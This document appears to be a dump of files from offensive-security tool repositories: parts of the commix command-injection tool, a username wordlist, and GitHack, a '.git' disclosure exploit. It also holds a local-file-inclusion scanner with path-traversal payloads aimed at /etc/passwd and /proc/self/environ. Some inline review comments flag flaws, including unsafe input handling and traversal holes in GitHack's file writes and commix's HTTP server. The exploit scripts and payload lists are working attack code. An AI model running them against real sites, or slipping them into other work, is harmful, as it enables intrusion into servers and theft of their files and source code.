24 | # i.e '/dev/null' for POSIX, 'nul' for Windows 25 | null = open(os.devnull,"w") 26 | subprocess.Popen(requirment, stdout=null, stderr=null) 27 | null.close() 28 | return True 29 | 30 | except OSError: 31 | return False 32 | 33 | # eof -------------------------------------------------------------------------------- /commix/src/utils/colors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | """ 17 | ANSI color codes 18 | """ 19 | 20 | """ 21 | Font colors 22 | """ 23 | RESET = '\033[0;0m' 24 | BOLD = '\033[1m' 25 | UNDERL = '\033[4m' 26 | GREY = '\033[90m' 27 | RED = '\033[31m' 28 | GREEN = '\033[32m' 29 | YELLOW = '\033[33m' 30 | BLUE = '\033[94m' 31 | PURPLE = '\033[95m' 32 | CYAN = '\033[96m' 33 | DARKCYAN = '\033[36m' 34 | 35 | """ 36 | Background Colors 37 | """ 38 | BGBLACK = '\033[40m' 39 | BGRED = '\033[41m' 40 | BGGREEN = '\033[42m' 41 | BGYELLOW = '\033[43m' 42 | BGBLUE = '\033[44m' 43 | BGMAGENTA = '\033[45m' 44 | BGCYAN = '\033[46m' 45 | BGWHITE = '\033[47m' 46 | 47 | #eof -------------------------------------------------------------------------------- /commix/src/utils/version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | 18 | from src.utils import settings 19 | from src.thirdparty.colorama import Fore, Back, Style, init 20 | 21 | """ 22 | Show version number and exit. 23 | """ 24 | def show_version(): 25 | print "\n" + settings.VERSION 26 | sys.exit(0) 27 | 28 | """ 29 | Check python version number. 30 | """ 31 | def python_version(): 32 | if settings.PYTHON_VERSION >= "3" or settings.PYTHON_VERSION < "2.6": 33 | err_msg = "Incompatible Python version (" 34 | err_msg += settings.PYTHON_VERSION + ") detected." 35 | print settings.print_critical_msg(err_msg) 36 | sys.exit(0) 37 | -------------------------------------------------------------------------------- /commix/src/core/tamper/space2ifs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with the internal field separator ('$IFS'). 20 | The internal field separator refers to a variable which defines the character 21 | or characters used to separate a pattern into tokens for some operations. 
22 | Notes: 23 | * This tamper script works against *nix targets 24 | """ 25 | 26 | if settings.TARGET_OS != "win": 27 | settings.TAMPER_SCRIPTS['space2ifs'] = True 28 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 29 | settings.WHITESPACE[0] = "${IFS}" 30 | else: 31 | settings.WHITESPACE.append("${IFS}") 32 | else: 33 | warn_msg = "Windows target host(s), does not support the (Bash) $IFS variable." 34 | print settings.print_warning_msg(warn_msg) 35 | 36 | #eof -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/thems_icon.py: -------------------------------------------------------------------------------- 1 | import os 2 | from time import sleep 3 | 4 | 5 | home = ''' 6 | 0 >> config systime 7 | 1 >> install icon 8 | 2 >> insuall themes 9 | ''' 10 | icon = ''' 11 | TOP icon 12 | 1 >> numix 13 | 14 | ''' 15 | print home 16 | sohaip = input('Enter number >>') # NOTE(review): the print statements make this Python 2, where input() evaluates the typed text as an expression; int(raw_input(...)) reads a number without evaluating it. The same applies to the two input() calls further down. 17 | print sohaip 18 | if sohaip == 0: 19 | os.system('sudo rm -rf /usr/share/themes/{Arc,Arc-Darker,Arc-Dark}') # NOTE(review): os.system hands the string to the system shell; the {a,b,c} form only expands in shells with brace expansion, so what is removed depends on which shell sh is. The return code of every os.system call in this script is ignored. 20 | os.system('rm -rf ~/.local/share/themes/{Arc,Arc-Darker,Arc-Dark}') 21 | os.system('rm -rf ~/.themes/{Arc,Arc-Darker,Arc-Dark}') 22 | os.system('sudo apt-get install autoconf automake pkg-config libgtk-3-dev') 23 | os.system('apt-get update') # NOTE(review): runs without sudo, unlike the install on the previous line, and only after that install. 24 | print home 25 | elif sohaip == 1: 26 | print icon 27 | input_icon = input('Enter number>>') 28 | print input_icon 29 | if input_icon == 1: 30 | os.system('sudo apt-add-repository ppa:numix/ppa') 31 | os.system('sudo apt-get update') 32 | os.system('sudo apt-get install numix-icon-theme numix-icon-theme-circle') 33 | elif sohaip == 2: 34 | thems = '''' 35 | 1 >> arc-theme 36 | ''' 37 | print thems 38 | thems_in = input('Enter number >>') 39 | if thems_in == 1: 40 | os.system('git clone https://github.com/horst3180/arc-theme --depth 1 && cd arc-theme') # NOTE(review): each os.system call starts its own shell, so this cd does not carry over; the next two commands run in the caller's working directory, and 'sudo make install' then runs whatever Makefile is there as root. 41 | os.system('./autogen.sh --prefix=/usr') 42 | os.system('sudo make install') 43 | 44 | 45 | 
-------------------------------------------------------------------------------- /commix/src/txt/usernames.txt: -------------------------------------------------------------------------------- 1 | 111111 2 | 123456 3 | 12345678 4 | abc123 5 | abramov 6 | account 7 | accounting 8 | ad 9 | adm 10 | admin 11 | administrator 12 | adver 13 | advert 14 | advertising 15 | afanasev 16 | agafonov 17 | agata 18 | aksenov 19 | aleksander 20 | aleksandrov 21 | alekse 22 | alenka 23 | alexe 24 | alexeev 25 | alla 26 | anatol 27 | andre 28 | andreev 29 | andrey 30 | anna 31 | anya 32 | ao 33 | aozt 34 | arhipov 35 | art 36 | avdeev 37 | avto 38 | bank 39 | baranov 40 | Baseball 41 | belousov 42 | bill 43 | billing 44 | blinov 45 | bobrov 46 | bogdanov 47 | buh 48 | buhg 49 | buhgalter 50 | buhgalteria 51 | business 52 | bux 53 | catchthismail 54 | company 55 | contact 56 | contactus 57 | corp 58 | design 59 | dir 60 | director 61 | direktor 62 | dragon 63 | economist 64 | edu 65 | email 66 | er 67 | expert 68 | export 69 | fabrika 70 | fin 71 | finance 72 | ftp 73 | glavbuh 74 | glavbux 75 | glbuh 76 | helloitmenice 77 | help 78 | holding 79 | home 80 | hr 81 | iamjustsendingthisleter 82 | info 83 | ingthisleter 84 | job 85 | john 86 | kadry 87 | letmein 88 | mail 89 | manager 90 | marketing 91 | marketing 92 | mike 93 | mogggnomgon 94 | monkey 95 | moscow 96 | mysql 97 | office 98 | ok 99 | oracle 100 | password 101 | personal 102 | petgord34truew 103 | post 104 | postmaster 105 | pr 106 | qwerty 107 | rbury 108 | reklama 109 | root 110 | r00t 111 | sale 112 | sales 113 | secretar 114 | sekretar 115 | support 116 | test 117 | testing 118 | thisisjusttestletter 119 | trade 120 | uploader 121 | user 122 | webmaster 123 | www-data 124 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/initialise.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. 
BSD 3-Clause license, see LICENSE file. 2 | import atexit 3 | import sys 4 | 5 | from .ansitowin32 import AnsiToWin32 6 | 7 | 8 | orig_stdout = None 9 | orig_stderr = None 10 | 11 | wrapped_stdout = None 12 | wrapped_stderr = None 13 | 14 | atexit_done = False 15 | 16 | 17 | def reset_all(): 18 | AnsiToWin32(orig_stdout).reset_all() 19 | 20 | 21 | def init(autoreset=False, convert=None, strip=None, wrap=True): 22 | 23 | if not wrap and any([autoreset, convert, strip]): 24 | raise ValueError('wrap=False conflicts with any other arg=True') 25 | 26 | global wrapped_stdout, wrapped_stderr 27 | global orig_stdout, orig_stderr 28 | 29 | orig_stdout = sys.stdout 30 | orig_stderr = sys.stderr 31 | 32 | if sys.stdout is None: 33 | wrapped_stdout = None 34 | else: 35 | sys.stdout = wrapped_stdout = \ 36 | wrap_stream(orig_stdout, convert, strip, autoreset, wrap) 37 | if sys.stderr is None: 38 | wrapped_stderr = None 39 | else: 40 | sys.stderr = wrapped_stderr = \ 41 | wrap_stream(orig_stderr, convert, strip, autoreset, wrap) 42 | 43 | global atexit_done 44 | if not atexit_done: 45 | atexit.register(reset_all) 46 | atexit_done = True 47 | 48 | 49 | def deinit(): 50 | if orig_stdout is not None: 51 | sys.stdout = orig_stdout 52 | if orig_stderr is not None: 53 | sys.stderr = orig_stderr 54 | 55 | 56 | def reinit(): 57 | if wrapped_stdout is not None: 58 | sys.stdout = wrapped_stdout 59 | if wrapped_stderr is not None: 60 | sys.stderr = wrapped_stderr 61 | 62 | 63 | def wrap_stream(stream, convert, strip, autoreset, wrap): 64 | if wrap: 65 | wrapper = AnsiToWin32(stream, 66 | convert=convert, strip=strip, autoreset=autoreset) 67 | if wrapper.should_wrap(): 68 | stream = wrapper.stream 69 | return stream 70 | 71 | 72 | -------------------------------------------------------------------------------- /commix/src/core/requests/proxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | 
This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | 19 | from src.utils import menu 20 | from src.utils import settings 21 | 22 | from src.core.requests import headers 23 | from src.thirdparty.colorama import Fore, Back, Style, init 24 | 25 | """ 26 | Check if HTTP Proxy is defined. 27 | """ 28 | def do_check(url): 29 | check_proxy = True 30 | info_msg = "Testing proxy " + menu.options.proxy + "... " 31 | sys.stdout.write(settings.print_info_msg(info_msg)) 32 | sys.stdout.flush() 33 | try: 34 | # Check if defined POST data 35 | if menu.options.data: 36 | request = urllib2.Request(url, menu.options.data) 37 | else: 38 | request = urllib2.Request(url) 39 | # Check if defined extra headers. 40 | headers.do_check(request) 41 | request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL) 42 | try: 43 | check = urllib2.urlopen(request) 44 | except urllib2.HTTPError, error: 45 | check = error 46 | except: 47 | check_proxy = False 48 | pass 49 | if check_proxy == True: 50 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + " ]\n") 51 | sys.stdout.flush() 52 | else: 53 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 54 | err_msg = "Could not connect to proxy." 
55 | print settings.print_critical_msg(err_msg) 56 | sys.exit(0) 57 | 58 | """ 59 | Use the defined HTTP Proxy 60 | """ 61 | def use_proxy(request): 62 | proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) 63 | opener = urllib2.build_opener(proxy) 64 | urllib2.install_opener(opener) 65 | response = urllib2.urlopen(request) 66 | 67 | return response -------------------------------------------------------------------------------- /commix/src/core/modules/modules_handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | import os 17 | import sys 18 | 19 | from src.utils import menu 20 | from src.utils import settings 21 | from src.thirdparty.colorama import Fore, Back, Style, init 22 | 23 | """ 24 | Load modules 25 | """ 26 | def load_modules(url, http_request_method, filename): 27 | 28 | # Check if defined the ICMP exfiltration module 29 | if menu.options.ip_icmp_data : 30 | try: 31 | # The ICMP exfiltration module 32 | from src.core.modules.icmp_exfiltration import icmp_exfiltration 33 | # The ICMP exfiltration handler 34 | icmp_exfiltration.icmp_exfiltration_handler(url, http_request_method) 35 | except ImportError as err_msg: 36 | print "\n" + settings.print_critical_msg(err_msg) 37 | sys.exit(0) 38 | sys.exit(0) 39 | 40 | # Check if defined the DNS exfiltration module 41 | if menu.options.dns_server : 42 | try: 43 | # The DNS exfiltration module 44 | from src.core.modules.dns_exfiltration import dns_exfiltration 45 | # The DNS exfiltration handler 46 | dns_exfiltration.dns_exfiltration_handler(url, http_request_method) 47 | except ImportError as err_msg: 48 | print "\n" + settings.print_critical_msg(err_msg) 49 | sys.exit(0) 50 | sys.exit(0) 51 | 52 | # Check if defined the shellshock module 53 | if menu.options.shellshock : 54 | try: 55 | # The shellshock module 56 | from src.core.modules.shellshock import shellshock 57 | # The shellshock handler 58 | shellshock.shellshock_handler(url, http_request_method, filename) 59 | except ImportError as err_msg: 60 | print "\n" + settings.print_critical_msg(err_msg) 61 | sys.exit(0) 62 | sys.exit(0) -------------------------------------------------------------------------------- /commix/src/core/requests/tor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | from src.utils import menu 19 | from src.utils import settings 20 | from src.utils import requirments 21 | from src.thirdparty.colorama import Fore, Back, Style, init 22 | 23 | """ 24 | Check for TOR HTTP Proxy. 25 | """ 26 | if menu.options.tor_port: 27 | PRIVOXY_PORT = menu.options.tor_port 28 | else: 29 | PRIVOXY_PORT = settings.PRIVOXY_PORT 30 | 31 | """ 32 | Check if HTTP Proxy (tor/privoxy) is defined. 33 | """ 34 | def do_check(): 35 | # Check if 'tor' is installed. 36 | requirment = "tor" 37 | requirments.do_check(requirment) 38 | 39 | # Check if 'privoxy' is installed. 40 | requirment = "privoxy" 41 | requirments.do_check(requirment) 42 | 43 | check_privoxy_proxy = True 44 | info_msg = "Testing privoxy proxy settings " 45 | info_msg += settings.PRIVOXY_IP + ":" + PRIVOXY_PORT + "... 
" 46 | sys.stdout.write(settings.print_info_msg(info_msg)) 47 | sys.stdout.flush() 48 | 49 | try: 50 | privoxy_proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL:settings.PRIVOXY_IP + ":" + PRIVOXY_PORT}) 51 | opener = urllib2.build_opener(privoxy_proxy) 52 | urllib2.install_opener(opener) 53 | 54 | except: 55 | check_privoxy_proxy = False 56 | pass 57 | 58 | if check_privoxy_proxy: 59 | try: 60 | new_ip = opener.open("http://icanhazip.com/").read() 61 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 62 | sys.stdout.flush() 63 | success_msg = "Your ip address appears to be " + new_ip 64 | sys.stdout.write(settings.print_success_msg(success_msg)) 65 | 66 | except urllib2.URLError, err_msg: 67 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 68 | print settings.print_critical_msg(err_msg) 69 | sys.exit(0) 70 | 71 | """ 72 | Use the TOR HTTP Proxy. 73 | """ 74 | def use_tor(request): 75 | if menu.options.offline: 76 | err_msg = "You cannot Tor network without access on the Internet." 77 | print settings.print_critical_msg(err_msg) 78 | sys.exit(0) 79 | 80 | privoxy_proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL:settings.PRIVOXY_IP + ":" + PRIVOXY_PORT}) 81 | opener = urllib2.build_opener(privoxy_proxy) 82 | urllib2.install_opener(opener) 83 | response = urllib2.urlopen(request) 84 | return response 85 | 86 | #eof -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/ansi.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | ''' 3 | This module generates ANSI character codes to printing colors to terminals. 
4 | See: http://en.wikipedia.org/wiki/ANSI_escape_code 5 | ''' 6 | 7 | CSI = '\033[' 8 | OSC = '\033]' 9 | BEL = '\007' 10 | 11 | 12 | def code_to_chars(code): 13 | return CSI + str(code) + 'm' 14 | 15 | 16 | class AnsiCodes(object): 17 | def __init__(self, codes): 18 | for name in dir(codes): 19 | if not name.startswith('_'): 20 | value = getattr(codes, name) 21 | setattr(self, name, code_to_chars(value)) 22 | 23 | 24 | class AnsiCursor(object): 25 | def UP(self, n=1): 26 | return CSI + str(n) + "A" 27 | def DOWN(self, n=1): 28 | return CSI + str(n) + "B" 29 | def FORWARD(self, n=1): 30 | return CSI + str(n) + "C" 31 | def BACK(self, n=1): 32 | return CSI + str(n) + "D" 33 | def POS(self, x=1, y=1): 34 | return CSI + str(y) + ";" + str(x) + "H" 35 | 36 | def set_title(title): 37 | return OSC + "2;" + title + BEL 38 | 39 | def clear_screen(mode=2): 40 | return CSI + str(mode) + "J" 41 | 42 | def clear_line(mode=2): 43 | return CSI + str(mode) + "K" 44 | 45 | 46 | class AnsiFore: 47 | BLACK = 30 48 | RED = 31 49 | GREY = 90 50 | GREEN = 32 51 | YELLOW = 33 52 | BLUE = 34 53 | MAGENTA = 35 54 | CYAN = 36 55 | WHITE = 37 56 | RESET = 39 57 | 58 | # These are fairly well supported, but not part of the standard. 59 | LIGHTBLACK_EX = 90 60 | LIGHTRED_EX = 91 61 | LIGHTGREEN_EX = 92 62 | LIGHTYELLOW_EX = 93 63 | LIGHTBLUE_EX = 94 64 | LIGHTMAGENTA_EX = 95 65 | LIGHTCYAN_EX = 96 66 | LIGHTWHITE_EX = 97 67 | 68 | 69 | class AnsiBack: 70 | BLACK = 40 71 | RED = 41 72 | GREEN = 42 73 | YELLOW = 43 74 | BLUE = 44 75 | MAGENTA = 45 76 | CYAN = 46 77 | WHITE = 47 78 | RESET = 49 79 | 80 | # These are fairly well supported, but not part of the standard. 
81 | LIGHTBLACK_EX = 100 82 | LIGHTRED_EX = 101 83 | LIGHTGREEN_EX = 102 84 | LIGHTYELLOW_EX = 103 85 | LIGHTBLUE_EX = 104 86 | LIGHTMAGENTA_EX = 105 87 | LIGHTCYAN_EX = 106 88 | LIGHTWHITE_EX = 107 89 | 90 | 91 | class AnsiStyle: 92 | BRIGHT = 1 93 | DIM = 2 94 | UNDERLINE = 4 95 | NORMAL = 22 96 | RESET_ALL = 0 97 | 98 | Fore = AnsiCodes( AnsiFore ) 99 | Back = AnsiCodes( AnsiBack ) 100 | Style = AnsiCodes( AnsiStyle ) 101 | Cursor = AnsiCursor() 102 | -------------------------------------------------------------------------------- /GitHack/GitHack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import sys 5 | import urllib2 6 | import os 7 | import urlparse 8 | import zlib 9 | import threading 10 | import Queue 11 | import re 12 | import time 13 | from lib.parser import parse 14 | 15 | 16 | if len(sys.argv) == 1: 17 | msg = """ 18 | 19 | A `.git` folder disclosure exploit. By LiJieJie 20 | 21 | Usage: GitHack.py http://www.target.com/.git/ 22 | 23 | bug-report: my[at]lijiejie.com (http://www.lijiejie.com) 24 | """ 25 | print msg 26 | sys.exit(0) 27 | 28 | 29 | class Scanner(object): 30 | def __init__(self): 31 | self.base_url = sys.argv[-1] 32 | self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_') 33 | if not os.path.exists(self.domain): 34 | os.mkdir(self.domain) 35 | print '[+] Download and parse index file ...' 
36 | data = self._request_data(sys.argv[-1] + '/index') 37 | with open('index', 'wb') as f: 38 | f.write(data) 39 | self.queue = Queue.Queue() 40 | for entry in parse('index'): 41 | if "sha1" in entry.keys(): 42 | self.queue.put((entry["sha1"].strip(), entry["name"].strip())) 43 | try: 44 | print entry['name'] 45 | except: 46 | pass 47 | self.lock = threading.Lock() 48 | self.thread_count = 20 49 | self.STOP_ME = False 50 | 51 | def _request_data(self, url): # Fetch url with a fixed mobile User-Agent header and return the whole response body. 52 | request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) 53 | return urllib2.urlopen(request).read() # NOTE(review): no timeout is passed to urlopen, so a stalled server blocks the calling worker; the body is read into memory in one piece. 54 | 55 | def _print(self, msg): # Print msg while holding self.lock. 56 | self.lock.acquire() 57 | print msg 58 | self.lock.release() 59 | 60 | def get_back_file(self): # Worker loop: take (sha1, file_name) pairs from self.queue, fetch the matching object under /objects/, decompress it and write it below self.domain; up to three attempts per object. 61 | while not self.STOP_ME: 62 | try: 63 | sha1, file_name = self.queue.get(timeout=0.5) 64 | except: 65 | break 66 | for i in range(3): 67 | try: 68 | folder = '/objects/%s/' % sha1[:2] 69 | data = self._request_data(self.base_url + folder + sha1[2:]) 70 | try: 71 | data = zlib.decompress(data) 72 | except: 73 | self._print('[Error] Fail to decompress %s' % file_name) 74 | data = re.sub('blob \d+\00', '', data) # NOTE(review): the pattern is not anchored to the start of the data, so a later 'blob <digits>\0' sequence inside the file content is removed as well. 75 | target_dir = os.path.join(self.domain, os.path.dirname(file_name) ) 76 | if target_dir and not os.path.exists(target_dir): 77 | os.makedirs(target_dir) 78 | with open( os.path.join(self.domain, file_name) , 'wb') as f: # NOTE(review): file_name comes from the index file fetched from the remote server and is joined without validation; os.path.join drops self.domain for an absolute name and keeps '..' segments, so a crafted index can make this write outside the output folder. Resolve the joined path and check it stays under self.domain before creating directories or opening the file. 79 | f.write(data) 80 | self._print('[OK] %s' % file_name) 81 | break 82 | except urllib2.HTTPError, e: 83 | if str(e).find('HTTP Error 404') >=0: 84 | self._print('[File not found] %s' % file_name) 85 | break 86 | except Exception, e: 87 | self._print('[Error] %s' % e) 88 | self.exit_thread() 89 | 90 | def exit_thread(self): # Decrement self.thread_count under self.lock. 91 | self.lock.acquire() 92 | self.thread_count -= 1 93 | self.lock.release() 94 | 95 | def scan(self): # Start self.thread_count threads, each running get_back_file. 96 | for i in range(self.thread_count): 97 | t = threading.Thread(target=self.get_back_file) 98 | t.start() 99 | 100 | 101 | s = Scanner() 102 | s.scan() 103 | try: 104 | 
while s.thread_count > 0: 105 | time.sleep(0.1) 106 | except KeyboardInterrupt, e: 107 | s.STOP_ME = True 108 | time.sleep(1.0) 109 | print 'User Aborted.' -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/local.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import urllib2 4 | import re 5 | from time import sleep 6 | 7 | home = ''' 8 | ==========================================================================================================| 9 | |============================================[sohaip-hackerDZ ]===========================================| 10 | |=====================================[http://python-root.blogspot.com ]=================================| 11 | |================================[https://www.facebook.com/sohaipbarika]==================================| 12 | |=========================================================================================================| 13 | | local file include scaner | 14 | |=========================================================================================================| 15 | ''' 16 | print home 17 | 18 | 19 | 20 | sohaip = raw_input ("enter TARGET >>") 21 | 22 | etc_passwd = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00"] 23 | 24 | environ = 
["/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00"] 25 | 26 | print ("\n[*] GET >> passwd") 27 | try: 28 | for inc in etc_passwd: 29 | hackerDZ = sohaip + inc 30 | response = urllib2.urlopen(hackerDZ).read() 31 | find = re.findall("root:x:",response) 32 | if find: 33 | print("[+]scaner don ->") 34 | sleep(1) 35 | print("[+]wite pless ->") 36 | sleep(1) 37 | print("[+]wite pless ->") 38 | sleep(1) 39 | print("[+]wite pless ->") 40 | sleep(1) 41 | print("[+]wite pless ->") 42 | sleep(1) 43 | print("[+]wite pless ->") 44 | sleep(1) 45 | print "[+]GET LFI -> " + hackerDZ 46 | elif find: 47 | print("erorr") 48 | 49 | except (KeyboardInterrupt, SystemExit): 50 | print("work is finished") 51 | 52 | print ("\n[*] GET >> environ") 53 | try: 54 | for inc in environ: 55 | hackerDZ = sohaip + inc 56 | response = urllib2.urlopen(hackerDZ).read() 57 | find = re.findall("DOCUMENT_ROOT",response) 58 | if find: 59 | print("[+]scaner don ->") 60 | sleep(1) 61 | print("[+]wite pless ->") 62 | sleep(1) 63 | print("[+]wite pless ->") 64 | sleep(1) 65 | print("[+]wite pless ->") 66 | sleep(1) 67 | print("[+]wite pless ->") 68 | sleep(1) 69 | print("[+]wite pless ->") 70 | sleep(1) 71 | print "[+] GET LFI -> " + hackerDZ 72 | elif find: 73 | 
print('erorr') 74 | except (KeyboardInterrupt, SystemExit): 75 | print("work is finished") -------------------------------------------------------------------------------- /commix/src/utils/simple_http_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import re 17 | import sys 18 | import errno 19 | import thread 20 | import socket 21 | import SocketServer 22 | from os import curdir, sep 23 | from src.utils import menu 24 | from src.utils import settings 25 | from socket import error as socket_error 26 | from src.thirdparty.colorama import Fore, Back, Style, init 27 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer 28 | 29 | """ 30 | Validates IPv4 addresses. 31 | """ 32 | def is_valid_ipv4(ip_addr): 33 | pattern = re.compile(r""" 34 | ^ 35 | (?: 36 | # Dotted variants: 37 | (?: 38 | # Decimal 1-255 (no leading 0's) 39 | [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2} 40 | | 41 | 0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's) 42 | | 43 | 0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's) 44 | ) 45 | (?: # Repeat 0-3 times, separated by a dot 46 | \. 
47 | (?: 48 | [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2} 49 | | 50 | 0x0*[0-9a-f]{1,2} 51 | | 52 | 0+[1-3]?[0-7]{0,2} 53 | ) 54 | ){0,3} 55 | | 56 | 0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff 57 | | 58 | 0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777 59 | | 60 | # Decimal notation, 1-4294967295: 61 | 429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}| 62 | 42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}| 63 | 4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8} 64 | ) 65 | $ 66 | """, re.VERBOSE | re.IGNORECASE) 67 | return pattern.match(ip_addr) is not None 68 | 69 | def grab_ip_addr(): # Return the local address of a UDP socket connected to 8.8.8.8 port 53; on a socket error print a message and exit. 70 | try: 71 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 72 | s.connect(("8.8.8.8",53)) 73 | s.settimeout(2) 74 | ip_addr = s.getsockname()[0] 75 | s.close() 76 | return ip_addr 77 | except socket_error, err_msg: 78 | if errno.ECONNREFUSED: # NOTE(review): this tests the errno constant itself, which is always truthy, so the else branch below never runs; the intended check is presumably err_msg.errno == errno.ECONNREFUSED. 79 | warn_msg = "Internet seems unreachable." 80 | print settings.print_warning_msg(warn_msg) 81 | else: 82 | print settings.print_critical_msg(str(err_msg)) + "\n" 83 | sys.exit(0) 84 | 85 | class Handler(BaseHTTPRequestHandler): # Request handler that answers GET with the content of the file named by the request path. 86 | def do_GET(self): 87 | try: 88 | #Open the static file requested and send it 89 | f = open(curdir + sep + self.path) # NOTE(review): self.path is the request path as sent by the client and is appended without normalisation, so '..' segments reach files outside the current directory, and main() binds this server to '' (all interfaces). Resolve the path and require it to stay under the served directory before opening. The file is also left open if a later call in this block raises. 90 | self.send_response(200) 91 | self.end_headers() 92 | self.wfile.write(f.read()) 93 | f.close() 94 | 95 | except IOError: 96 | 